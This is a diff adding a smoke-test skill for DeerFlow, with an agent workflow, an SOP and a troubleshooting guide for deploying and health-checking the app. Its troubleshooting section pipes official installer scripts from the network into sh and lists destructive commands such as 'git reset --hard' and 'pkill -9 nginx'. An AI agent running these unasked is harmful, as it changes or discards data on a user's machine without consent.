Compare commits
48 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| e75a2ff29a | |||
| 185f5649dd | |||
| 092bf13f5e | |||
| fe2595a05c | |||
| 718dddde75 | |||
| 679ca657ee | |||
| fa96acdf4b | |||
| 90299e2710 | |||
| 7dc0c7d01f | |||
| 809b341350 | |||
| b1aabe88b8 | |||
| 654354c624 | |||
| eef0a6e2da | |||
| b107444878 | |||
| 16aa51c9b3 | |||
| 133ffe7174 | |||
| f88970985a | |||
| 6572fa5b75 | |||
| 194bab4691 | |||
| 35f141fc48 | |||
| 0b6fa8b9e1 | |||
| 140907ce1d | |||
| 52718b0f23 | |||
| 563383c60f | |||
| 1b74d84590 | |||
| 823f3af98c | |||
| 13664e99e7 | |||
| 60e0abfdb8 | |||
| 616caa92b1 | |||
| 31a3c9a3de | |||
| ad6d934a5f | |||
| 5350b2fb24 | |||
| 29817c3b34 | |||
| e5b149068c | |||
| 85b7ed3cec | |||
| 24805200f0 | |||
| 722a9c4753 | |||
| d1baf7212b | |||
| 0948c7a4e1 | |||
| c3170f22da | |||
| 1193ac64dc | |||
| ab41de2961 | |||
| 3b3e8e1b0b | |||
| 4004fb849f | |||
| f467e613b6 | |||
| f0dd8cb0d2 | |||
| 7643a46fca | |||
| c4da0e8ca9 |
@@ -0,0 +1,181 @@
|
||||
---
|
||||
name: smoke-test
|
||||
description: End-to-end smoke test skill for DeerFlow. Guides through: 1) Pulling latest code, 2) Docker OR Local installation and deployment (user preference, default to Local if Docker network issues), 3) Service availability verification, 4) Health check, 5) Final test report. Use when the user says "run smoke test", "smoke test deployment", "verify installation", "test service availability", "end-to-end test", or similar.
|
||||
---
|
||||
|
||||
# DeerFlow Smoke Test Skill
|
||||
|
||||
This skill guides the Agent through DeerFlow's full end-to-end smoke test workflow, including code updates, deployment (supporting both Docker and local installation modes), service availability verification, and health checks.
|
||||
|
||||
## Deployment Mode Selection
|
||||
|
||||
This skill supports two deployment modes:
|
||||
- **Local installation mode** (recommended, especially when network issues occur) - Run all services directly on the local machine
|
||||
- **Docker mode** - Run all services inside Docker containers
|
||||
|
||||
**Selection strategy**:
|
||||
- If the user explicitly asks for Docker mode, use Docker
|
||||
- If network issues occur (such as slow image pulls), automatically switch to local mode
|
||||
- Default to local mode whenever possible
|
||||
|
||||
## Structure
|
||||
|
||||
```
|
||||
smoke-test/
|
||||
├── SKILL.md ← You are here - core workflow and logic
|
||||
├── scripts/
|
||||
│ ├── check_docker.sh ← Check the Docker environment
|
||||
│ ├── check_local_env.sh ← Check local environment dependencies
|
||||
│ ├── frontend_check.sh ← Frontend page smoke check
|
||||
│ ├── pull_code.sh ← Pull the latest code
|
||||
│ ├── deploy_docker.sh ← Docker deployment
|
||||
│ ├── deploy_local.sh ← Local deployment
|
||||
│ └── health_check.sh ← Service health check
|
||||
├── references/
|
||||
│ ├── SOP.md ← Standard operating procedure
|
||||
│ └── troubleshooting.md ← Troubleshooting guide
|
||||
└── templates/
|
||||
├── report.local.template.md ← Local mode smoke test report template
|
||||
└── report.docker.template.md ← Docker mode smoke test report template
|
||||
```
|
||||
|
||||
## Standard Operating Procedure (SOP)
|
||||
|
||||
### Phase 1: Code Update Check
|
||||
|
||||
1. **Confirm current directory** - Verify that the current working directory is the DeerFlow project root
|
||||
2. **Check Git status** - See whether there are uncommitted changes
|
||||
3. **Pull the latest code** - Use `git pull origin main` to get the latest updates
|
||||
4. **Confirm code update** - Verify that the latest code was pulled successfully
|
||||
|
||||
### Phase 2: Deployment Mode Selection and Environment Check
|
||||
|
||||
**Choose deployment mode**:
|
||||
- Ask for user preference, or choose automatically based on network conditions
|
||||
- Default to local installation mode
|
||||
|
||||
**Local mode environment check**:
|
||||
1. **Check Node.js version** - Requires 22+
|
||||
2. **Check pnpm** - Package manager
|
||||
3. **Check uv** - Python package manager
|
||||
4. **Check nginx** - Reverse proxy
|
||||
5. **Check required ports** - Confirm that ports 2026, 3000, 8001, and 2024 are not occupied
|
||||
|
||||
**Docker mode environment check** (if Docker is selected):
|
||||
1. **Check whether Docker is installed** - Run `docker --version`
|
||||
2. **Check Docker daemon status** - Run `docker info`
|
||||
3. **Check Docker Compose availability** - Run `docker compose version`
|
||||
4. **Check required ports** - Confirm that port 2026 is not occupied
|
||||
|
||||
### Phase 3: Configuration Preparation
|
||||
|
||||
1. **Check whether config.yaml exists**
|
||||
- If it does not exist, run `make config` to generate it
|
||||
- If it already exists, check whether it needs an upgrade with `make config-upgrade`
|
||||
2. **Check the .env file**
|
||||
- Verify that required environment variables are configured
|
||||
- Especially model API keys such as `OPENAI_API_KEY`
|
||||
|
||||
### Phase 4: Deployment Execution
|
||||
|
||||
**Local mode deployment**:
|
||||
1. **Check dependencies** - Run `make check`
|
||||
2. **Install dependencies** - Run `make install`
|
||||
3. **(Optional) Pre-pull the sandbox image** - If needed, run `make setup-sandbox`
|
||||
4. **Start services** - Run `make dev-daemon` (background mode, recommended) or `make dev` (foreground mode)
|
||||
5. **Wait for startup** - Give all services enough time to start completely (90-120 seconds recommended)
|
||||
|
||||
**Docker mode deployment** (if Docker is selected):
|
||||
1. **Initialize Docker environment** - Run `make docker-init`
|
||||
2. **Start Docker services** - Run `make docker-start`
|
||||
3. **Wait for startup** - Give all containers enough time to start completely (60 seconds recommended)
|
||||
|
||||
### Phase 5: Service Health Check
|
||||
|
||||
**Local mode health check**:
|
||||
1. **Check process status** - Confirm that LangGraph, Gateway, Frontend, and Nginx processes are all running
|
||||
2. **Check frontend service** - Visit `http://localhost:2026` and verify that the page loads
|
||||
3. **Check API Gateway** - Verify the `http://localhost:2026/health` endpoint
|
||||
4. **Check LangGraph service** - Verify the availability of relevant endpoints
|
||||
5. **Frontend route smoke check** - Run `bash .agent/skills/smoke-test/scripts/frontend_check.sh` to verify key routes under `/workspace`
|
||||
|
||||
**Docker mode health check** (when using Docker):
|
||||
1. **Check container status** - Run `docker ps` and confirm that all containers are running
|
||||
2. **Check frontend service** - Visit `http://localhost:2026` and verify that the page loads
|
||||
3. **Check API Gateway** - Verify the `http://localhost:2026/health` endpoint
|
||||
4. **Check LangGraph service** - Verify the availability of relevant endpoints
|
||||
5. **Frontend route smoke check** - Run `bash .agent/skills/smoke-test/scripts/frontend_check.sh` to verify key routes under `/workspace`
|
||||
|
||||
### Optional Functional Verification
|
||||
|
||||
1. **List available models** - Verify that model configuration loads correctly
|
||||
2. **List available skills** - Verify that the skill directory is mounted correctly
|
||||
3. **Simple chat test** - Send a simple message to verify the end-to-end flow
|
||||
|
||||
### Phase 6: Generate Test Report
|
||||
|
||||
1. **Collect all test results** - Summarize execution status for each phase
|
||||
2. **Record encountered issues** - If anything fails, record the error details
|
||||
3. **Generate the final report** - Use the template that matches the selected deployment mode to create the complete test report, including overall conclusion, detailed key test cases, and explicit frontend page / route results
|
||||
4. **Provide follow-up recommendations** - Offer suggestions based on the test results
|
||||
|
||||
## Execution Rules
|
||||
|
||||
- **Follow the sequence** - Execute strictly in the order described above
|
||||
- **Idempotency** - Every step should be safe to repeat
|
||||
- **Error handling** - If a step fails, stop and report the issue, then provide troubleshooting suggestions
|
||||
- **Detailed logging** - Record the execution result and status of each step
|
||||
- **User confirmation** - Ask for confirmation before potentially risky operations such as overwriting config
|
||||
- **Mode preference** - Prefer local mode to avoid network-related issues
|
||||
- **Template requirement** - The final report must use the matching template under `templates/`; do not output a free-form summary instead of the template-based report
|
||||
- **Report clarity** - The execution summary must include the overall pass/fail conclusion plus per-case result explanations, and frontend smoke check results must be listed explicitly in the report
|
||||
- **Optional phase handling** - If functional verification is not executed, do not present it as a separate skipped phase in the final report
|
||||
|
||||
## Known Acceptable Warnings
|
||||
|
||||
The following warnings can appear during smoke testing and do not block a successful result:
|
||||
- Feishu/Lark SSL errors in Gateway logs (certificate verification failure) can be ignored if that channel is not enabled
|
||||
- Warnings in LangGraph logs about missing methods in the custom checkpointer, such as `adelete_for_runs` or `aprune`, do not affect the core functionality
|
||||
|
||||
## Key Tools
|
||||
|
||||
Use the following tools during execution:
|
||||
|
||||
1. **bash** - Run shell commands
|
||||
2. **present_file** - Show generated reports and important files
|
||||
3. **task_tool** - Organize complex steps with subtasks when needed
|
||||
|
||||
## Success Criteria
|
||||
|
||||
Smoke test pass criteria (local mode):
|
||||
- [x] Latest code is pulled successfully
|
||||
- [x] Local environment check passes (Node.js 22+, pnpm, uv, nginx)
|
||||
- [x] Configuration files are set up correctly
|
||||
- [x] `make check` passes
|
||||
- [x] `make install` completes successfully
|
||||
- [x] `make dev` starts successfully
|
||||
- [x] All service processes run normally
|
||||
- [x] Frontend page is accessible
|
||||
- [x] Frontend route smoke check passes (`/workspace` key routes)
|
||||
- [x] API Gateway health check passes
|
||||
- [x] Test report is generated completely
|
||||
|
||||
Smoke test pass criteria (Docker mode):
|
||||
- [x] Latest code is pulled successfully
|
||||
- [x] Docker environment check passes
|
||||
- [x] Configuration files are set up correctly
|
||||
- [x] `make docker-init` completes successfully
|
||||
- [x] `make docker-start` completes successfully
|
||||
- [x] All Docker containers run normally
|
||||
- [x] Frontend page is accessible
|
||||
- [x] Frontend route smoke check passes (`/workspace` key routes)
|
||||
- [x] API Gateway health check passes
|
||||
- [x] Test report is generated completely
|
||||
|
||||
## Read Reference Files
|
||||
|
||||
Before starting execution, read the following reference files:
|
||||
1. `references/SOP.md` - Detailed step-by-step operating instructions
|
||||
2. `references/troubleshooting.md` - Common issues and solutions
|
||||
3. `templates/report.local.template.md` - Local mode test report template
|
||||
4. `templates/report.docker.template.md` - Docker mode test report template
|
||||
@@ -0,0 +1,452 @@
|
||||
# DeerFlow Smoke Test Standard Operating Procedure (SOP)
|
||||
|
||||
This document describes the detailed operating steps for each phase of the DeerFlow smoke test.
|
||||
|
||||
## Phase 1: Code Update Check
|
||||
|
||||
### 1.1 Confirm Current Directory
|
||||
|
||||
**Objective**: Verify that the current working directory is the DeerFlow project root.
|
||||
|
||||
**Steps**:
|
||||
1. Run `pwd` to view the current working directory
|
||||
2. Check whether the directory contains the following files/directories:
|
||||
- `Makefile`
|
||||
- `backend/`
|
||||
- `frontend/`
|
||||
- `config.example.yaml`
|
||||
|
||||
**Success Criteria**: The current directory contains all of the files/directories listed above.
|
||||
|
||||
---
|
||||
|
||||
### 1.2 Check Git Status
|
||||
|
||||
**Objective**: Check whether there are uncommitted changes.
|
||||
|
||||
**Steps**:
|
||||
1. Run `git status`
|
||||
2. Check whether the output includes "Changes not staged for commit" or "Untracked files"
|
||||
|
||||
**Notes**:
|
||||
- If there are uncommitted changes, recommend that the user commit or stash them first to avoid conflicts while pulling
|
||||
- If the user confirms that they want to continue, this step can be skipped
|
||||
|
||||
---
|
||||
|
||||
### 1.3 Pull the Latest Code
|
||||
|
||||
**Objective**: Fetch the latest code updates.
|
||||
|
||||
**Steps**:
|
||||
1. Run `git fetch origin main`
|
||||
2. Run `git pull origin main`
|
||||
|
||||
**Success Criteria**:
|
||||
- The commands succeed without errors
|
||||
- The output shows "Already up to date" or indicates that new commits were pulled successfully
|
||||
|
||||
---
|
||||
|
||||
### 1.4 Confirm Code Update
|
||||
|
||||
**Objective**: Verify that the latest code was pulled successfully.
|
||||
|
||||
**Steps**:
|
||||
1. Run `git log -1 --oneline` to view the latest commit
|
||||
2. Record the commit hash and message
|
||||
|
||||
---
|
||||
|
||||
## Phase 2: Deployment Mode Selection and Environment Check
|
||||
|
||||
### 2.1 Choose Deployment Mode
|
||||
|
||||
**Objective**: Decide whether to use local mode or Docker mode.
|
||||
|
||||
**Decision Flow**:
|
||||
1. Prefer local mode first to avoid network-related issues
|
||||
2. If the user explicitly requests Docker, use Docker
|
||||
3. If Docker network issues occur, switch to local mode automatically
|
||||
|
||||
---
|
||||
|
||||
### 2.2 Local Mode Environment Check
|
||||
|
||||
**Objective**: Verify that local development environment dependencies are satisfied.
|
||||
|
||||
#### 2.2.1 Check Node.js Version
|
||||
|
||||
**Steps**:
|
||||
1. If nvm is used, run `nvm use 22` to switch to Node 22+
|
||||
2. Run `node --version`
|
||||
|
||||
**Success Criteria**: Version >= 22.x
|
||||
|
||||
**Failure Handling**:
|
||||
- If the version is too low, ask the user to install/switch Node.js with nvm:
|
||||
```bash
|
||||
nvm install 22
|
||||
nvm use 22
|
||||
```
|
||||
- Or install it from the official website: https://nodejs.org/
|
||||
|
||||
---
|
||||
|
||||
#### 2.2.2 Check pnpm
|
||||
|
||||
**Steps**:
|
||||
1. Run `pnpm --version`
|
||||
|
||||
**Success Criteria**: The command returns pnpm version information.
|
||||
|
||||
**Failure Handling**:
|
||||
- If pnpm is not installed, ask the user to install it with `npm install -g pnpm`
|
||||
|
||||
---
|
||||
|
||||
#### 2.2.3 Check uv
|
||||
|
||||
**Steps**:
|
||||
1. Run `uv --version`
|
||||
|
||||
**Success Criteria**: The command returns uv version information.
|
||||
|
||||
**Failure Handling**:
|
||||
- If uv is not installed, ask the user to install uv
|
||||
|
||||
---
|
||||
|
||||
#### 2.2.4 Check nginx
|
||||
|
||||
**Steps**:
|
||||
1. Run `nginx -v`
|
||||
|
||||
**Success Criteria**: The command returns nginx version information.
|
||||
|
||||
**Failure Handling**:
|
||||
- macOS: install with Homebrew using `brew install nginx`
|
||||
- Linux: install using the system package manager
|
||||
|
||||
---
|
||||
|
||||
#### 2.2.5 Check Required Ports
|
||||
|
||||
**Steps**:
|
||||
1. Run the following commands to check ports:
|
||||
```bash
|
||||
lsof -i :2026 # Main port
|
||||
lsof -i :3000 # Frontend
|
||||
lsof -i :8001 # Gateway
|
||||
lsof -i :2024 # LangGraph
|
||||
```
|
||||
|
||||
**Success Criteria**: All ports are free, or they are occupied only by DeerFlow-related processes.
|
||||
|
||||
**Failure Handling**:
|
||||
- If a port is occupied, ask the user to stop the related process
|
||||
|
||||
---
|
||||
|
||||
### 2.3 Docker Mode Environment Check (If Docker Is Selected)
|
||||
|
||||
#### 2.3.1 Check Whether Docker Is Installed
|
||||
|
||||
**Steps**:
|
||||
1. Run `docker --version`
|
||||
|
||||
**Success Criteria**: The command returns Docker version information, such as "Docker version 24.x.x".
|
||||
|
||||
---
|
||||
|
||||
#### 2.3.2 Check Docker Daemon Status
|
||||
|
||||
**Steps**:
|
||||
1. Run `docker info`
|
||||
|
||||
**Success Criteria**: The command runs successfully and shows Docker system information.
|
||||
|
||||
**Failure Handling**:
|
||||
- If it fails, ask the user to start Docker Desktop or the Docker service
|
||||
|
||||
---
|
||||
|
||||
#### 2.3.3 Check Docker Compose Availability
|
||||
|
||||
**Steps**:
|
||||
1. Run `docker compose version`
|
||||
|
||||
**Success Criteria**: The command returns Docker Compose version information.
|
||||
|
||||
---
|
||||
|
||||
#### 2.3.4 Check Required Ports
|
||||
|
||||
**Steps**:
|
||||
1. Run `lsof -i :2026` (macOS/Linux) or `netstat -ano | findstr :2026` (Windows)
|
||||
|
||||
**Success Criteria**: Port 2026 is free, or it is occupied only by a DeerFlow-related process.
|
||||
|
||||
**Failure Handling**:
|
||||
- If the port is occupied by another process, ask the user to stop that process or change the configuration
|
||||
|
||||
---
|
||||
|
||||
## Phase 3: Configuration Preparation
|
||||
|
||||
### 3.1 Check config.yaml
|
||||
|
||||
**Steps**:
|
||||
1. Check whether `config.yaml` exists
|
||||
2. If it does not exist, run `make config`
|
||||
3. If it already exists, consider running `make config-upgrade` to merge new fields
|
||||
|
||||
**Validation**:
|
||||
- Check whether at least one model is configured in config.yaml
|
||||
- Check whether the model configuration references the correct environment variables
|
||||
|
||||
---
|
||||
|
||||
### 3.2 Check the .env File
|
||||
|
||||
**Steps**:
|
||||
1. Check whether the `.env` file exists
|
||||
2. If it does not exist, copy it from `.env.example`
|
||||
3. Check whether the following environment variables are configured:
|
||||
- `OPENAI_API_KEY` (or other model API keys)
|
||||
- Other required settings
|
||||
|
||||
---
|
||||
|
||||
## Phase 4: Deployment Execution
|
||||
|
||||
### 4.1 Local Mode Deployment
|
||||
|
||||
#### 4.1.1 Check Dependencies
|
||||
|
||||
**Steps**:
|
||||
1. Run `make check`
|
||||
|
||||
**Description**: This command validates all required tools (Node.js 22+, pnpm, uv, nginx).
|
||||
|
||||
---
|
||||
|
||||
#### 4.1.2 Install Dependencies
|
||||
|
||||
**Steps**:
|
||||
1. Run `make install`
|
||||
|
||||
**Description**: This command installs both backend and frontend dependencies.
|
||||
|
||||
**Notes**:
|
||||
- This step may take some time
|
||||
- If network issues cause failures, try using a closer or mirrored package registry
|
||||
|
||||
---
|
||||
|
||||
#### 4.1.3 (Optional) Pre-pull the Sandbox Image
|
||||
|
||||
**Steps**:
|
||||
1. If Docker / Container sandbox is used, run `make setup-sandbox`
|
||||
|
||||
**Description**: This step is optional and not needed for local sandbox mode.
|
||||
|
||||
---
|
||||
|
||||
#### 4.1.4 Start Services
|
||||
|
||||
**Steps**:
|
||||
1. Run `make dev-daemon` (background mode)
|
||||
|
||||
**Description**: This command starts all services (LangGraph, Gateway, Frontend, Nginx).
|
||||
|
||||
**Notes**:
|
||||
- `make dev` runs in the foreground and stops with Ctrl+C
|
||||
- `make dev-daemon` runs in the background
|
||||
- Use `make stop` to stop services
|
||||
|
||||
---
|
||||
|
||||
#### 4.1.5 Wait for Services to Start
|
||||
|
||||
**Steps**:
|
||||
1. Wait 90-120 seconds for all services to start completely
|
||||
2. You can monitor startup progress by checking these log files:
|
||||
- `logs/langgraph.log`
|
||||
- `logs/gateway.log`
|
||||
- `logs/frontend.log`
|
||||
- `logs/nginx.log`
|
||||
|
||||
---
|
||||
|
||||
### 4.2 Docker Mode Deployment (If Docker Is Selected)
|
||||
|
||||
#### 4.2.1 Initialize the Docker Environment
|
||||
|
||||
**Steps**:
|
||||
1. Run `make docker-init`
|
||||
|
||||
**Description**: This command pulls the sandbox image if needed.
|
||||
|
||||
---
|
||||
|
||||
#### 4.2.2 Start Docker Services
|
||||
|
||||
**Steps**:
|
||||
1. Run `make docker-start`
|
||||
|
||||
**Description**: This command builds and starts all required Docker containers.
|
||||
|
||||
---
|
||||
|
||||
#### 4.2.3 Wait for Services to Start
|
||||
|
||||
**Steps**:
|
||||
1. Wait 60-90 seconds for all services to start completely
|
||||
2. You can run `make docker-logs` to monitor startup progress
|
||||
|
||||
---
|
||||
|
||||
## Phase 5: Service Health Check
|
||||
|
||||
### 5.1 Local Mode Health Check
|
||||
|
||||
#### 5.1.1 Check Process Status
|
||||
|
||||
**Steps**:
|
||||
1. Run the following command to check processes:
|
||||
```bash
|
||||
ps aux | grep -E "(langgraph|uvicorn|next|nginx)" | grep -v grep
|
||||
```
|
||||
|
||||
**Success Criteria**: Confirm that the following processes are running:
|
||||
- LangGraph (`langgraph dev`)
|
||||
- Gateway (`uvicorn app.gateway.app:app`)
|
||||
- Frontend (`next dev` or `next start`)
|
||||
- Nginx (`nginx`)
|
||||
|
||||
---
|
||||
|
||||
#### 5.1.2 Check Frontend Service
|
||||
|
||||
**Steps**:
|
||||
1. Use curl or a browser to visit `http://localhost:2026`
|
||||
2. Verify that the page loads normally
|
||||
|
||||
**Example curl command**:
|
||||
```bash
|
||||
curl -I http://localhost:2026
|
||||
```
|
||||
|
||||
**Success Criteria**: Returns an HTTP 200 status code.
|
||||
|
||||
---
|
||||
|
||||
#### 5.1.3 Check API Gateway
|
||||
|
||||
**Steps**:
|
||||
1. Visit `http://localhost:2026/health`
|
||||
|
||||
**Example curl command**:
|
||||
```bash
|
||||
curl http://localhost:2026/health
|
||||
```
|
||||
|
||||
**Success Criteria**: Returns health status JSON.
|
||||
|
||||
---
|
||||
|
||||
#### 5.1.4 Check LangGraph Service
|
||||
|
||||
**Steps**:
|
||||
1. Visit relevant LangGraph endpoints to verify availability
|
||||
|
||||
---
|
||||
|
||||
### 5.2 Docker Mode Health Check (When Using Docker)
|
||||
|
||||
#### 5.2.1 Check Container Status
|
||||
|
||||
**Steps**:
|
||||
1. Run `docker ps`
|
||||
2. Confirm that the following containers are running:
|
||||
- `deer-flow-nginx`
|
||||
- `deer-flow-frontend`
|
||||
- `deer-flow-gateway`
|
||||
- `deer-flow-langgraph` (if not in gateway mode)
|
||||
|
||||
---
|
||||
|
||||
#### 5.2.2 Check Frontend Service
|
||||
|
||||
**Steps**:
|
||||
1. Use curl or a browser to visit `http://localhost:2026`
|
||||
2. Verify that the page loads normally
|
||||
|
||||
**Example curl command**:
|
||||
```bash
|
||||
curl -I http://localhost:2026
|
||||
```
|
||||
|
||||
**Success Criteria**: Returns an HTTP 200 status code.
|
||||
|
||||
---
|
||||
|
||||
#### 5.2.3 Check API Gateway
|
||||
|
||||
**Steps**:
|
||||
1. Visit `http://localhost:2026/health`
|
||||
|
||||
**Example curl command**:
|
||||
```bash
|
||||
curl http://localhost:2026/health
|
||||
```
|
||||
|
||||
**Success Criteria**: Returns health status JSON.
|
||||
|
||||
---
|
||||
|
||||
#### 5.2.4 Check LangGraph Service
|
||||
|
||||
**Steps**:
|
||||
1. Visit relevant LangGraph endpoints to verify availability
|
||||
|
||||
---
|
||||
|
||||
## Optional Functional Verification
|
||||
|
||||
### 6.1 List Available Models
|
||||
|
||||
**Steps**: Verify the model list through the API or UI.
|
||||
|
||||
---
|
||||
|
||||
### 6.2 List Available Skills
|
||||
|
||||
**Steps**: Verify the skill list through the API or UI.
|
||||
|
||||
---
|
||||
|
||||
### 6.3 Simple Chat Test
|
||||
|
||||
**Steps**: Send a simple message to test the complete workflow.
|
||||
|
||||
---
|
||||
|
||||
## Phase 6: Generate the Test Report
|
||||
|
||||
### 6.1 Collect Test Results
|
||||
|
||||
Summarize the execution status of each phase and record successful and failed items.
|
||||
|
||||
### 6.2 Record Issues
|
||||
|
||||
If anything fails, record detailed error information.
|
||||
|
||||
### 6.3 Generate the Report
|
||||
|
||||
Use the template to create a complete test report.
|
||||
|
||||
### 6.4 Provide Recommendations
|
||||
|
||||
Provide follow-up recommendations based on the test results.
|
||||
@@ -0,0 +1,612 @@
|
||||
# Troubleshooting Guide
|
||||
|
||||
This document lists common issues encountered during DeerFlow smoke testing and how to resolve them.
|
||||
|
||||
## Code Update Issues
|
||||
|
||||
### Issue: `git pull` Fails with a Merge Conflict Warning
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
error: Your local changes to the following files would be overwritten by merge
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Option A: Commit local changes first
|
||||
```bash
|
||||
git add .
|
||||
git commit -m "Save local changes"
|
||||
git pull origin main
|
||||
```
|
||||
|
||||
2. Option B: Stash local changes
|
||||
```bash
|
||||
git stash
|
||||
git pull origin main
|
||||
git stash pop # Restore changes later if needed
|
||||
```
|
||||
|
||||
3. Option C: Discard local changes (use with caution)
|
||||
```bash
|
||||
git reset --hard HEAD
|
||||
git pull origin main
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Local Mode Environment Issues
|
||||
|
||||
### Issue: Node.js Version Is Too Old
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
Node.js version is too old. Requires 22+, got x.x.x
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Install or upgrade Node.js with nvm:
|
||||
```bash
|
||||
nvm install 22
|
||||
nvm use 22
|
||||
```
|
||||
|
||||
2. Or download and install it from the official website: https://nodejs.org/
|
||||
|
||||
3. Verify the version:
|
||||
```bash
|
||||
node --version
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: pnpm Is Not Installed
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
command not found: pnpm
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Install pnpm with npm:
|
||||
```bash
|
||||
npm install -g pnpm
|
||||
```
|
||||
|
||||
2. Or use the official installation script:
|
||||
```bash
|
||||
curl -fsSL https://get.pnpm.io/install.sh | sh -
|
||||
```
|
||||
|
||||
3. Verify the installation:
|
||||
```bash
|
||||
pnpm --version
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: uv Is Not Installed
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
command not found: uv
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Use the official installation script:
|
||||
```bash
|
||||
curl -LsSf https://astral.sh/uv/install.sh | sh
|
||||
```
|
||||
|
||||
2. macOS users can also install it with Homebrew:
|
||||
```bash
|
||||
brew install uv
|
||||
```
|
||||
|
||||
3. Verify the installation:
|
||||
```bash
|
||||
uv --version
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: nginx Is Not Installed
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
command not found: nginx
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. macOS (Homebrew):
|
||||
```bash
|
||||
brew install nginx
|
||||
```
|
||||
|
||||
2. Ubuntu/Debian:
|
||||
```bash
|
||||
sudo apt update
|
||||
sudo apt install nginx
|
||||
```
|
||||
|
||||
3. CentOS/RHEL:
|
||||
```bash
|
||||
sudo yum install nginx
|
||||
```
|
||||
|
||||
4. Verify the installation:
|
||||
```bash
|
||||
nginx -v
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: Port Is Already in Use
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
Error: listen EADDRINUSE: address already in use :::2026
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
1. Find the process using the port:
|
||||
```bash
|
||||
lsof -i :2026 # macOS/Linux
|
||||
netstat -ano | findstr :2026 # Windows
|
||||
```
|
||||
|
||||
2. Stop that process:
|
||||
```bash
|
||||
kill -9 <PID> # macOS/Linux
|
||||
taskkill /PID <PID> /F # Windows
|
||||
```
|
||||
|
||||
3. Or stop DeerFlow services first:
|
||||
```bash
|
||||
make stop
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Local Mode Dependency Installation Issues
|
||||
|
||||
### Issue: `make install` Fails Due to Network Timeout
|
||||
|
||||
**Symptoms**:
|
||||
Network timeouts or connection failures occur during dependency installation.
|
||||
|
||||
**Solutions**:
|
||||
1. Configure pnpm to use a mirror registry:
|
||||
```bash
|
||||
pnpm config set registry https://registry.npmmirror.com
|
||||
```
|
||||
|
||||
2. Configure uv to use a mirror registry:
|
||||
```bash
|
||||
uv pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple
|
||||
```
|
||||
|
||||
3. Retry the installation:
|
||||
```bash
|
||||
make install
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: Python Dependency Installation Fails
|
||||
|
||||
**Symptoms**:
|
||||
Errors occur during `uv sync`.
|
||||
|
||||
**Solutions**:
|
||||
1. Clean the uv cache:
|
||||
```bash
|
||||
cd backend
|
||||
uv cache clean
|
||||
```
|
||||
|
||||
2. Resync dependencies:
|
||||
```bash
|
||||
cd backend
|
||||
uv sync
|
||||
```
|
||||
|
||||
3. View detailed error logs:
|
||||
```bash
|
||||
cd backend
|
||||
uv sync --verbose
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: Frontend Dependency Installation Fails
|
||||
|
||||
**Symptoms**:
|
||||
Errors occur during `pnpm install`.
|
||||
|
||||
**Solutions**:
|
||||
1. Clean the pnpm cache:
|
||||
```bash
|
||||
cd frontend
|
||||
pnpm store prune
|
||||
```
|
||||
|
||||
2. Remove node_modules and the lock file:
|
||||
```bash
|
||||
cd frontend
|
||||
rm -rf node_modules pnpm-lock.yaml
|
||||
```
|
||||
|
||||
3. Reinstall:
|
||||
```bash
|
||||
cd frontend
|
||||
pnpm install
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Local Mode Service Startup Issues
|
||||
|
||||
### Issue: Services Exit Immediately After Startup
|
||||
|
||||
**Symptoms**:
|
||||
Processes exit quickly after running `make dev-daemon`.
|
||||
|
||||
**Solutions**:
|
||||
1. Check log files:
|
||||
```bash
|
||||
tail -f logs/langgraph.log
|
||||
tail -f logs/gateway.log
|
||||
tail -f logs/frontend.log
|
||||
tail -f logs/nginx.log
|
||||
```
|
||||
|
||||
2. Check whether config.yaml is configured correctly
|
||||
3. Check environment variables in the .env file
|
||||
4. Confirm that required ports are not occupied
|
||||
5. Stop all services and restart:
|
||||
```bash
|
||||
make stop
|
||||
make dev-daemon
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: Nginx Fails to Start Because Temp Directories Do Not Exist
|
||||
|
||||
**Symptoms**:
|
||||
```
|
||||
nginx: [emerg] mkdir() "/opt/homebrew/var/run/nginx/client_body_temp" failed (2: No such file or directory)
|
||||
```
|
||||
|
||||
**Solutions**:
|
||||
Add local temp directory configuration to `docker/nginx/nginx.local.conf` so nginx uses the repository's temp directory.
|
||||
|
||||
Add the following at the beginning of the `http` block:
|
||||
```nginx
|
||||
client_body_temp_path temp/client_body_temp;
|
||||
proxy_temp_path temp/proxy_temp;
|
||||
fastcgi_temp_path temp/fastcgi_temp;
|
||||
uwsgi_temp_path temp/uwsgi_temp;
|
||||
scgi_temp_path temp/scgi_temp;
|
||||
```
|
||||
|
||||
Note: The `temp/` directory under the repository root is created automatically by `make dev` or `make dev-daemon`.
|
||||
|
||||
---
|
||||
|
||||
### Issue: Nginx Fails to Start (General)
|
||||
|
||||
**Symptoms**:
|
||||
The nginx process fails to start or reports an error.
|
||||
|
||||
**Solutions**:
|
||||
1. Check the nginx configuration:
|
||||
```bash
|
||||
nginx -t -c docker/nginx/nginx.local.conf -p .
|
||||
```
|
||||
|
||||
2. Check nginx logs:
|
||||
```bash
|
||||
tail -f logs/nginx.log
|
||||
```
|
||||
|
||||
3. Ensure no other nginx process is running:
|
||||
```bash
|
||||
ps aux | grep nginx
|
||||
```
|
||||
|
||||
4. If needed, stop existing nginx processes:
|
||||
```bash
|
||||
pkill -9 nginx
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
### Issue: Frontend Compilation Fails
|
||||
|
||||
**Symptoms**:
|
||||
Compilation errors appear in `frontend.log`.
|
||||
